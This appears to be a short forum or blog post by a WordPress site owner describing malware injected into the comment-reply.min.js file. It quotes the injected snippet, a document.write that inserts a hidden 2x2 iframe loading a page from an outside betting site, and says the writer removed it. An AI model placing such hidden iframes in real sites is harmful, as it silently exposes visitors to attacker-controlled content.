I was facing frequent malware attacks on my wordpress site. Code injection was in this file wp-includes/js/comment-reply.min.js?ver=3.5.1. The code is with different urls like griebwal and many more.
[document.write('<iframe name=Twitter scrolling=auto framebor der=no align=center height=2 width=2 src=http://168bet.com/c ocs.html?j=1194757></iframe>');]
I removed this successfully and now my site is secure. I write a complete solution at this link.